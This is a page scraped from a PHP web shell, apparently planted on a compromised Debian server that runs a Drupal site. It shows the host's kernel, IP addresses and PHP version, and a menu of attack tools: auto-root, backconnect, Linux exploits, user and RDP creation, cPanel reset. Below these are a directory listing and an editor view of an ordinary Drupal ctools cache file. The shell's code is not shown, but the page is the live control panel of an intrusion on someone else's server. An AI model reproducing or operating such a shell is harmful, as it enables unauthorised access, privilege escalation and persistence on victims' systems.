Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.107.50
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
action-links.theme.inc
697
B
-rw-r--r--
ajax.inc
4.67
KB
-rw-r--r--
cache.inc
5.79
KB
-rw-r--r--
cache.plugin-type.inc
236
B
-rw-r--r--
cleanstring.inc
7.66
KB
-rw-r--r--
collapsible.theme.inc
2.46
KB
-rw-r--r--
content.inc
25.63
KB
-rw-r--r--
content.menu.inc
6.67
KB
-rw-r--r--
content.plugin-type.inc
381
B
-rw-r--r--
content.theme.inc
458
B
-rw-r--r--
context-access-admin.inc
15.17
KB
-rw-r--r--
context-admin.inc
27.37
KB
-rw-r--r--
context-task-handler.inc
17.42
KB
-rw-r--r--
context.inc
47.33
KB
-rw-r--r--
context.menu.inc
1.23
KB
-rw-r--r--
context.plugin-type.inc
545
B
-rw-r--r--
context.theme.inc
12.42
KB
-rw-r--r--
css-cache.inc
971
B
-rw-r--r--
css.inc
17.43
KB
-rw-r--r--
dependent.inc
6.16
KB
-rw-r--r--
dropbutton.theme.inc
5.05
KB
-rw-r--r--
dropdown.theme.inc
3.1
KB
-rw-r--r--
entity-access.inc
4.61
KB
-rw-r--r--
export-ui.inc
16.62
KB
-rw-r--r--
export-ui.menu.inc
710
B
-rw-r--r--
export-ui.plugin-type.inc
536
B
-rw-r--r--
export.inc
39.03
KB
-rw-r--r--
fields.inc
12.42
KB
-rw-r--r--
jump-menu.inc
4.6
KB
-rw-r--r--
language.inc
1.18
KB
-rw-r--r--
math-expr.inc
17.69
KB
-rw-r--r--
menu.inc
3.28
KB
-rw-r--r--
modal.inc
7.77
KB
-rw-r--r--
object-cache.cron.inc
345
B
-rw-r--r--
object-cache.inc
6.39
KB
-rw-r--r--
page-wizard.inc
5.12
KB
-rw-r--r--
page-wizard.menu.inc
756
B
-rw-r--r--
plugins-admin.inc
7.38
KB
-rw-r--r--
plugins.inc
31.89
KB
-rw-r--r--
registry.inc
3
KB
-rw-r--r--
stylizer.inc
48.24
KB
-rw-r--r--
stylizer.theme.inc
647
B
-rw-r--r--
utility.inc
1.05
KB
-rw-r--r--
uuid.inc
1.97
KB
-rw-r--r--
views.inc
879
B
-rw-r--r--
wizard.inc
17.74
KB
-rw-r--r--
wizard.theme.inc
539
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : object-cache.inc
<?php /** * @file * The non-volatile object cache is used to store an object while it is * being edited, so that we don't have to save until we're completely * done. The cache should be 'cleaned' on a regular basis, meaning to * remove old objects from the cache, but otherwise the data in this * cache must remain stable, as it includes unsaved changes. */ /** * Get an object from the non-volatile ctools cache. * * This function caches in memory as well, so that multiple calls to this * will not result in multiple database reads. * * @param $obj * A 128 character or less string to define what kind of object is being * stored; primarily this is used to prevent collisions. * @param $name * The name of the object being stored. * @param $skip_cache * Skip the memory cache, meaning this must be read from the db again. * @param $sid * The session id, allowing someone to use Session API or their own solution; * defaults to session_id(). * * @deprecated $skip_cache is deprecated in favor of drupal_static* * @return * The data that was cached. */ function ctools_object_cache_get($obj, $name, $skip_cache = FALSE, $sid = NULL) { $cache = &drupal_static(__FUNCTION__, array()); $key = "$obj:$name"; if ($skip_cache) { unset($cache[$key]); } if (!$sid) { $sid = session_id(); } if (!array_key_exists($key, $cache)) { $data = db_query('SELECT * FROM {ctools_object_cache} WHERE sid = :session_id AND obj = :object AND name = :name', array(':session_id' => $sid, ':object' => $obj, ':name' => $name)) ->fetchObject(); if ($data) { $cache[$key] = unserialize($data->data); } } return isset($cache[$key]) ? $cache[$key] : NULL; } /** * Store an object in the non-volatile ctools cache. * * @param $obj * A 128 character or less string to define what kind of object is being * stored; primarily this is used to prevent collisions. * @param $name * The name of the object being stored. * @param $cache * The object to be cached. This will be serialized prior to writing. * @param $sid * The session id, allowing someone to use Session API or their own solution; * defaults to session_id(). */ function ctools_object_cache_set($obj, $name, $cache, $sid = NULL) { // Store the CTools session id in the user session to force a // session for anonymous users in Drupal 7 and Drupal 6 Pressflow. // see http://drupal.org/node/562374, http://drupal.org/node/861778 if (empty($GLOBALS['user']->uid) && empty($_SESSION['ctools_session_id'])) { $_SESSION['ctools_hold_session'] = TRUE; } ctools_object_cache_clear($obj, $name, $sid); if (!$sid) { $sid = session_id(); } db_insert('ctools_object_cache') ->fields(array( 'sid' => $sid, 'obj' => $obj, 'name' => $name, 'data' => serialize($cache), 'updated' => REQUEST_TIME, )) ->execute(); } /** * Remove an object from the non-volatile ctools cache * * @param $obj * A 128 character or less string to define what kind of object is being * stored; primarily this is used to prevent collisions. * @param $name * The name of the object being removed. * @param $sid * The session id, allowing someone to use Session API or their own solution; * defaults to session_id(). */ function ctools_object_cache_clear($obj, $name, $sid = NULL) { if (!$sid) { $sid = session_id(); } db_delete('ctools_object_cache') ->condition('sid', $sid) ->condition('obj', $obj) ->condition('name', $name) ->execute(); // Ensure the static cache is emptied of this obj:name set. drupal_static_reset('ctools_object_cache_get'); } /** * Determine if another user has a given object cached. * * This is very useful for 'locking' objects so that only one user can * modify them. * * @param $obj * A 128 character or less string to define what kind of object is being * stored; primarily this is used to prevent collisions. * @param $name * The name of the object being removed. * @param $sid * The session id, allowing someone to use Session API or their own solution; * defaults to session_id(). * * @return * An object containing the UID and updated date if found; NULL if not. */ function ctools_object_cache_test($obj, $name, $sid = NULL) { if (!$sid) { $sid = session_id(); } return db_query('SELECT s.uid, c.updated FROM {ctools_object_cache} c INNER JOIN {sessions} s ON c.sid = s.sid WHERE s.sid <> :session_id AND c.obj = :obj AND c.name = :name ORDER BY c.updated ASC', array(':session_id' => $sid, ':obj' => $obj, ':name' => $name)) ->fetchObject(); } /** * Get the cache status of a group of objects. * * This is useful for displaying lock status when listing a number of objects * an an administration UI. * * @param $obj * A 128 character or less string to define what kind of object is being * stored; primarily this is used to prevent collisions. * @param $names * An array of names of objects * * @return * An array of objects containing the UID and updated date for each name found. */ function ctools_object_cache_test_objects($obj, $names) { return db_query("SELECT c.name, s.uid, c.updated FROM {ctools_object_cache} c INNER JOIN {sessions} s ON c.sid = s.sid WHERE c.obj = :obj AND c.name IN (:names) ORDER BY c.updated ASC", array(':obj' => $obj, ':names' => $names)) ->fetchAllAssoc('name'); } /** * Remove an object from the non-volatile ctools cache for all session IDs. * * This is useful for clearing a lock. * * @param $obj * A 128 character or less string to define what kind of object is being * stored; primarily this is used to prevent collisions. * @param $name * The name of the object being removed. */ function ctools_object_cache_clear_all($obj, $name) { db_delete('ctools_object_cache') ->condition('obj', $obj) ->condition('name', $name) ->execute(); // Ensure the static cache is emptied of this obj:name set. $cache = &drupal_static('ctools_object_cache_get', array()); unset($cache["$obj:$name"]); } /** * Remove all objects in the object cache that are older than the * specified age. * * @param $age * The minimum age of objects to remove, in seconds. For example, 86400 is * one day. Defaults to 7 days. */ function ctools_object_cache_clean($age = NULL) { if (empty($age)) { $age = 86400 * 7; // 7 days } db_delete('ctools_object_cache') ->condition('updated', REQUEST_TIME - $age, '<') ->execute(); }
Close